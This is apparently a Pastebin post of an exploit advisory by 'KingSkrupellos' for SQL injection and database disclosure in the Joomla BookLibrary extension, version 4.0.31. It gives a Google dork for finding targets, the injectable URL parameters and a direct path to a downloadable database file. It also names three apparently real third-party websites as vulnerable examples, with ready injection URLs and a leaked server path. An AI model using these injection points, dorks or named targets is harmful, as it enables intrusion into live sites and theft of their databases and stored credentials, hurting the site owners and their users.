KingSkrupellos

Joomla BookLibrary 4.0.31 SQL Inj DB Disc

Feb 11th, 2019
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.43 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla BookLibrary 4.0.31 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : ordasoft.com
  8. # Software Download Link : ordasoft.com/book-library-joomla-ebook-extension
  9. github.com/latinproject/bibliotecalatin/blob/master/administrator/components/com_booklibrary/
  10. # Software Information Link : extensions.joomla.org/extension/booklibrary-basic/
  11. # Software Version : 3.0 and 4.0.31 and other previous versions.
  12. # Software Prices : Free - Pro 40$ - PRO Shop Package 55$ - Developer Membership 259$
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : inurl:''/index.php?option=com_booklibrary''
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. CWE-200 [ Information Exposure ]
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ####################################################################
  25.  
  26. # Description about Software :
  27. ***************************
  28. BookLibrary is a powerful book extension. Book component provides a
  29.  
  30. full-featured book library or book collection management environment on a Joomla-based
  31.  
  32. website. Book manager allows you to manage large book libraries.
  33.  
  34. Library manager can also be used to easily set up a book selling shop using
  35.  
  36. Amazon if you want. With an Amazon Associates ID (as an Amazon affiliate)
  37.  
  38. you can earn credits with book sales through Amazon, while Amazon
  39.  
  40. takes care of the handling and shipping.
  41.  
  42. ####################################################################
  43.  
  44. # Impact :
  45. ***********
  46. * Joomla BookLibrary 4.0.31 and other versions -
  47.  
  48. component for Joomla is prone to an SQL-injection vulnerability because it
  49.  
  50. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  51.  
  52. Exploiting this issue could allow an attacker to compromise the application,
  53.  
  54. access or modify data, or exploit latent vulnerabilities in the underlying database.
  55.  
  56. A remote attacker can send a specially crafted request to the vulnerable application
  57.  
  58. and execute arbitrary SQL commands in application`s database.
  59.  
  60. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  61.  
  62. An attacker can exploit this issue using a browser.
  63.  
  64. * This Software prone to an information exposure/database disclosure vulnerability.
  65.  
  66. Successful exploits of this issue may allow an attacker to obtain sensitive
  67.  
  68. information by downloading the full contents of the application's database.
  69.  
  70. * Any remote user may download the database files and gain access
  71.  
  72. to sensitive information including unencrypted authentication credentials.
  73.  
  74. ####################################################################
  75.  
  76. # SQL Injection Exploit :
  77. **********************
  78. /index.php?option=com_booklibrary&task=showCategory&catid=[SQL Injection]
  79.  
  80. /index.php?option=com_booklibrary&task=showCategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
  81.  
  82. /index.php?option=com_booklibrary&task=showCategory&catid=[ID-NUMBER]&limitstart=[ID-NUMBER]&sortup=title&Itemid=[SQL Injection]
  83.  
  84. # Database Disclosure Exploit :
  85. ****************************
  86. /administrator/components/com_booklibrary/exports/sample_data.dat
  87.  
  88. ####################################################################
  89.  
  90. # Example Vulnerable Sites :
  91. *************************
  92. [+] arcoeste.it/portale/index.php?option=com_booklibrary&task=
  93. showCategory&catid=130&limitstart=2130&sortup=title&Itemid=106%27
  94.  
  95. [+] imagobiblioteca.it/index.php?option=com_booklibrary
  96. &task=showCategory&catid=35&Itemid=144%27
  97.  
  98. [+] nybv.us/jl/administrator/components/com_booklibrary/exports/sample_data.dat
  99.  
  100. ####################################################################
  101.  
  102. # Example SQL Database Error :
  103. ****************************
  104.  
  105. Strict Standards: Non-static method JLoader::import() should not be
  106. called statically in /web/htdocs/www.arcoeste.it/home/portale
  107. /libraries/joomla/import.php on line 29
  108.  
  109. ####################################################################
  110.  
  111. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  112.  
  113. ####################################################################
Add Comment
Please, Sign In to add comment